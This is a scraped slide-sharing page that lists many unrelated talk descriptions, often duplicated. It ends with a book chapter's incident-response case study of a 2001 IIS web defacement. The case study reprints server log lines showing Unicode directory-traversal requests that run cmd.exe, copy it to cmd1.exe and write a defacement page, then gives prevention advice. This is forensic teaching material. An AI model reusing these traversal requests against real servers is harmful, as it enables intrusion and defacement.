The attacker exploited a known vulnerability in Microsoft IIS Web server version 5.0 to gain access to the victim's web server. They used cmd.exe commands to explore the server and obtain information. The attacker then created a file called cmd1.exe to hide their actions, defaced the website, and installed a web page announcing the hacking before leaving. The incident occurred over 10 minutes and could have been prevented by keeping software updated and restricting user privileges.
Security Awareness related to common malwares, (viruses, trojans, worms etc) the damages they cause and basic countermeasures one can adopt to protect against them.
Security Awareness related to common malwares, (viruses, trojans, worms etc) the damages they cause and basic countermeasures one can adopt to protect against them.
Analysis of-security-algorithms-in-cloud-computing [autosaved]Md. Fazla Rabbi
Security system in cloud for storing data is not safe enough. When data is valuable specially in the cloud computing, it's security considered to be the key requirement. Also it is get more important when it is hard to make it safe. It becomes hard to keep data safe due to lack of strong data encryption system. Cloud possesses the security problem in Data segregation, Data theft, unauthorized access, Uncleaned Owner and responsibility of Data Protection, Data Loss conditions.
Poodle stands for Padding Oracle On Downgraded Legacy Encryption is an attack on SSL v3.0 which brings end of SSL. If you have got any doubts with the presentation, feel free to contact me via email.
- Introduction to Web Security
- Why Is Security So Important?
- Web Security Considerations
- Web Security Approaches
- Secure Socket Layer (SSL) and Transport Layer Security (TLS)
- Secure Electronic Transaction (SET)
- Recommended Reading
- Problems
Security is the first concerning criteria in software development. Here, we will know about the role of developer and information security staff. The Secure Software development model (S-SDLC) is also described here.
Our bad neighbor makes us early stirrers,
Which is both healthful and good husbandry.
-- William Shakespeare (1564–1616), King Henry, in Henry V, act 4, sc. 1, l. 6-7.
Complete coverage of CISSP 7th Chapter - Security Operations. I have made sure to cover all topics from three books in this presentation. For corrections, clarifications, please feel free to reach me.
Analysis on NIMDA Worm in Windows | Exploitation | Detection | PropagationGayan Weerarathna
Analysis on NIMDA Worm in Windows | Exploitation | Detection | Propagation
In this presentaion wwe are mainly focussing on the blow mentioned key topics related to NIMDA warm;
What is NIMDA ?
Propagation via Windows Shares, Web & Emails.
How NIMDA works via web browsers?
What can Attacker Do after Compromising Your System?
CVEs related to Nimda.
Signs of Infection.
NIMDA Signatures.
Key aspects involved like OS, protocols, Applications & Services.
Recommendations for For Network Admins & For End User Systems.
Analysis of-security-algorithms-in-cloud-computing [autosaved]Md. Fazla Rabbi
Security system in cloud for storing data is not safe enough. When data is valuable specially in the cloud computing, it's security considered to be the key requirement. Also it is get more important when it is hard to make it safe. It becomes hard to keep data safe due to lack of strong data encryption system. Cloud possesses the security problem in Data segregation, Data theft, unauthorized access, Uncleaned Owner and responsibility of Data Protection, Data Loss conditions.
Poodle stands for Padding Oracle On Downgraded Legacy Encryption is an attack on SSL v3.0 which brings end of SSL. If you have got any doubts with the presentation, feel free to contact me via email.
- Introduction to Web Security
- Why Is Security So Important?
- Web Security Considerations
- Web Security Approaches
- Secure Socket Layer (SSL) and Transport Layer Security (TLS)
- Secure Electronic Transaction (SET)
- Recommended Reading
- Problems
Security is the first concerning criteria in software development. Here, we will know about the role of developer and information security staff. The Secure Software development model (S-SDLC) is also described here.
Our bad neighbor makes us early stirrers,
Which is both healthful and good husbandry.
-- William Shakespeare (1564–1616), King Henry, in Henry V, act 4, sc. 1, l. 6-7.
Complete coverage of CISSP 7th Chapter - Security Operations. I have made sure to cover all topics from three books in this presentation. For corrections, clarifications, please feel free to reach me.
Analysis on NIMDA Worm in Windows | Exploitation | Detection | PropagationGayan Weerarathna
Analysis on NIMDA Worm in Windows | Exploitation | Detection | Propagation
In this presentaion wwe are mainly focussing on the blow mentioned key topics related to NIMDA warm;
What is NIMDA ?
Propagation via Windows Shares, Web & Emails.
How NIMDA works via web browsers?
What can Attacker Do after Compromising Your System?
CVEs related to Nimda.
Signs of Infection.
NIMDA Signatures.
Key aspects involved like OS, protocols, Applications & Services.
Recommendations for For Network Admins & For End User Systems.
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ Hack...Soya Aoyama
The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of"Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.
The Internet of Insecure Things: 10 Most Wanted ListSecurity Weekly
In this talk I will quickly bring you up to speed on the history of embedded device insecurity. Next, we will look at a real-world example or two of how devices are exploited (And attackers profited). Finally, you will learn what we can do to help fix these problems and push the industry for a much higher level of security for devices affecting our daily lives.
You may have heard about this threat, one that has plagued our lives and networks for well over a decade. A problem so ubiquitous, it can't be ignored. Yet, this threat has a history of hiding in plain sight. Users are, for the most part, unaware of the dangers. Security researchers and the media have attempted to highlight this problem for years, without making an impact on improving security. However, vendors and users are still very much at risk and the problem is still largely being ignored by the masses. The Internet of Things (IoT) aims to makes our lives better, yet there is still no foundation for security controls on the devices that allow us to access the Internet, listen to music, watch television, control the temperature in our homes and more. The goal of this talk is to enable the audience to help raise awareness and influence the security of embedded systems in a positive way.
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Ramnit is a worm that spreads through removable drives by infecting files. The worm (W32.Ramnit) was first discovered in early 2010 and later that year, a second variant of Ramnit (W32.Ramnit.B) was identified. Since then, Ramnit’s operators have made considerable upgrades to the threat, including implementing the use of modules, which was borrowed from the leaked source code of the Zeus banking Trojan (Trojan.Zbot) in May 2011.
Currently, Ramnit’s operators are primarily focused on information-stealing tactics, targeting data such as passwords and online banking login credentials. They also install remote access tools on affected computers in order to maintain back door connectivity. It is estimated that the Ramnit botnet may consist of up to 350,000 compromised computers worldwide.
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
1. 1
The French Connection
by Bill Pennington, Guardent, Inc.
197
Copyright 2002 by The McGraw-Hill Companies, Inc. Click Here for Terms of Use.
2. P
uzzled from what appeared to be a lack of evidence, the I.T. staff began to re-
search Web defacement attacks and soon discovered that the Web server soft-
ware they were using, Microsoft’s IIS Web server version 5.0, had a well-known
bug that easily allowed attackers to take control of the machine. The bug the attacker
exploited, the “Web server file request parsing vulnerability” (better known as the
“Unicode Attack”), is detailed in the CVE database under #CVE-2000-0886.
This was an unsettling discovery for the I.T. staff; they realized that this server
was on the inside of the network when it was compromised. Therefore, the attacker
could now have backdoors to any number of systems inside the network, as well as
copies of sensitive data and passwords.
Once the I.T. staff knew the probable method of entry, the well-known Unicode
Web server bug, they began to piece together the attack. The bug relies on the ability
to execute a system shell, a program called cmd.exe, in order to execute commands
on the Web server. The I.T. staff found that if this bug was used, evidence of the at-
tack would be in the Web server log files. They collected all of the log files from the
Web server and imported them into a database for analysis. As cmd.exe is not a
normally occurring string in Web server log files, they performed a search for that
string and found the following:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3
1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
This was the first probe. If successful, the attacker would get a directory listing
of the victim computer’s C drive. This is a common, non-invasive technique em-
ployed by automated scanning programs to test whether a computer is vulnerable
to this bug, without causing any damage.
The next entry was another probe, looking at the directory listing of the D drive,
if it existed:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 3
1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The following 13 log file entries show the attacker retrieving various directory
listings in order to get a lay of the land, so he could be familiar with the environ-
ment. This involved retrieving more directory listings, as well as viewing the vic-
tim’s home page.
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+e: 502 381 484 4
7 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3
198 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
4. 200 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
GET /xyzBuzz3.swf - 200 245 324 5141 www.victim.com Mozilla/4.0+(c
ompatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compat
ible;+MSIE+5.0;+Windows+98) http://www.victim.com/buzzxyz.html
Once the attacker had a better understanding of the environment, the attack be-
gan. First, he renamed an auxiliary Web page to test his capabilities:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:wwwrootdet
our.html+detour.html.old 502 355 522 31 www.victim.com Mozilla/4.0+
(compatible;+MSIE+5.0;+Windows+98)
Next, he created a directory, c:ArA, to set up shop; copied cmd.exe to his
work area; and renamed it cmd1.exe:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+md+c:ArA 502 355 48
8 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:winntsystem3
2cmd.Exe+c:ArAcmd1.exe 502 382 524 125 www.victim.com Mozilla/4.
0+(compatible;+MSIE+5.0;+Windows+98)
The preceding is the last entry for the cmd.exe search. It becomes clear that the
attacker was then using cmd1.exe to do his dirty work. A search for cmd1.exe
turned up the entries that follow.
In the first entry for the cmd1.exe search, the attacker built the Web page he
wanted to use to replace the real Web page on the server:
03/03/2001 4:07 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center
><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+
friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.<
br>Someone+should+check+your+system+security+coz+you+sure+aren't.<b
r></h2>"+>+c:ArAdefault.htm 502 355 763 31 www.victim.com Mozilla
/4.0+(compatible;+MSIE+5.0;+Windows+98)
The attacker made a backup of the original Web site:
03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../ArA/cmd1.exe /c+rename+d:wwwrootindex.html+in
dex.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible;
+MSIE+5.0;+Windows+98)
5. Finally, the attacker copied the defaced Web site over the original Web site and
viewed his handiwork:
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../ArA/cmd1.exe /c+copy+c:ArAdefault.htm+d:wwwr
ootindex.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatibl
e;+MSIE+5.0;+Windows+98)
03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compa
tible;+MSIE+5.0;+Windows+98)
As you can see from the log files, the attack from start to finish took just ten minutes.
ANSWERS
1. The attacker used the “Web server file request parsing vulnerability,” as
detailed in the CVE database under #CVE-2000-0886, to get into the Web
server.
2. The attacker made a copy of cmd.exe and renamed it to cmd1.exe,
which obfuscated the audit trail, forcing the forensic investigator to
follow a new log pattern.
PREVENTION
Prevention of this attack would have been simple if the software on the Web server
was kept up to date. The patch for the vulnerability the attacker used was released
five months prior to the penetration. The patch in this case was in the form of a
hot-fix, and at the time of this writing had not been rolled into a full-service pack.
The administrators had installed all the service packs but had failed to install the ad-
ditional hot-fixes.
Proper hardening of the Web server could also have prevented this attack. When
executing this attack, the attacker is issuing commands as the IUSR_COMPTERNAME
account. This account has no special administrative privileges on the Web server other
than the privileges given to EVERYONE. The EVERYONE group, by default, has per-
mission to execute all of the commands located in the %winnt%/system32 directory.
On most servers of this kind, administrators are the only users that need to execute
these commands from the console. Removing the rights for the EVERYONE group to
execute the commands in the %winnt%/system32 directory would have prevented
this attack, and most other attacks in the same class.
Solution 1: The French Connection 201
6. MITIGATION
To mitigate the damage caused by the penetration, the company decided to com-
pletely rebuild the Web server from scratch using the latest software available.
While not always necessary, a complete rebuild is the best way to regain strong
confidence in a machine’s software after a penetration. For continued security and
accountability, the maintenance of the machine was assigned to a single person. In
order to gain peace of mind, the company also ordered a security audit from an
outside firm to assess any possible deeper penetration of their internal infrastruc-
ture. No further damage was found. However, a few weeks later, the company
would again find themselves in need of security assistance; that story is detailed in
Challenge 2, “The Insider.”
ADDITIONAL RESOURCES
The Honeynet project had a scan of the month of February 2001 that profiled a very
similar attack:
http://project.honeynet.org/scans/scan12/
Microsoft’s security bulletin for the vulnerability, including patch information:
http://www.microsoft.com/technet/security/bulletin/ms00-086.asp
The CVE entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886
202 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios